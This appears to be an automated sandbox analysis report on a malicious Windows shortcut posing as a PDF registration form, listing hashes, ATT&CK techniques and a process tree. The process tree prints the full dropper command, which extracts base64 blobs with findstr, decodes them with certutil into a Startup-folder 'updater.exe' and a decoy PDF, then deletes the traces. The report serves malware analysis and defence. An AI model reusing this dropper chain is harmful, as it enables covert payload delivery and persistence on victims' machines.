4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04/09/2024, 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f.lnk
Size

2.0MB
MD5

ce92fc90e5b4387531b7875fb57158d3
SHA1

cd2e458f49db5575e0e9015a07faab6e43bc2d61
SHA256

4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f
SHA512

8854cb96fd90b0a5316f49f78b39e66465de3f935c6365c77fc26fcc2b5254ba0c1f08203ccdb9c955725d1f0ccacf9f02f32811c831998b8323450319cd61b3
SSDEEP

24576:FKrzksL207JGXwCBB+aDYfNucQ8sSNJTjiOLuo+Gq7OWVp4i3rHnP/v6vB7HQ4AV:QVpdwqqOLnQ3baBSxKG1ysjTH

Score

6^/10

defense_evasion

Malware Config

Signatures

Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
1312	certutil.exe
2884	cmd.exe
2664	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2644 wrote to memory of 2884	2644	cmd.exe	31
PID 2644 wrote to memory of 2884	2644	cmd.exe	31
PID 2644 wrote to memory of 2884	2644	cmd.exe	31
PID 2884 wrote to memory of 2688	2884	cmd.exe	32
PID 2884 wrote to memory of 2688	2884	cmd.exe	32
PID 2884 wrote to memory of 2688	2884	cmd.exe	32
PID 2884 wrote to memory of 2596	2884	cmd.exe	33
PID 2884 wrote to memory of 2596	2884	cmd.exe	33
PID 2884 wrote to memory of 2596	2884	cmd.exe	33
PID 2884 wrote to memory of 2664	2884	cmd.exe	34
PID 2884 wrote to memory of 2664	2884	cmd.exe	34
PID 2884 wrote to memory of 2664	2884	cmd.exe	34
PID 2884 wrote to memory of 1312	2884	cmd.exe	35
PID 2884 wrote to memory of 1312	2884	cmd.exe	35
PID 2884 wrote to memory of 1312	2884	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "cd C:\Users\Admin\AppData\Local\Temp/*_registration_form.pdf.zip/&findstr TVqQAAMA registration_form.pdf.lnk > C:\Users\Admin\AppData\Local\Temp\2.txt&findstr JVBERi0x registration_form.pdf.lnk >C:\Users\Admin\AppData\Local\Temp\1.txt&cd C:\Users\Admin\AppData\Local\Temp&certutil -decode 2.txt C:\Users\Admin\AppData\Roaming\Microsoft\Windows\STARTM~1\Programs\Startup\updater.exe"&certutil -decode 1.txt registration_form.pdf&registration_form.pdf&del 1.txt 2.txt
  2⤵
  - Deobfuscate/Decode Files or Information
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\system32\findstr.exe
    findstr TVqQAAMA registration_form.pdf.lnk
    3⤵
    PID:2688
- - C:\Windows\system32\findstr.exe
    findstr JVBERi0x registration_form.pdf.lnk
    3⤵
    PID:2596
- - C:\Windows\system32\certutil.exe
    certutil -decode 2.txt C:\Users\Admin\AppData\Roaming\Microsoft\Windows\STARTM~1\Programs\Startup\updater.exe
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:2664
- - C:\Windows\system32\certutil.exe
    certutil -decode 1.txt registration_form.pdf
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:1312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads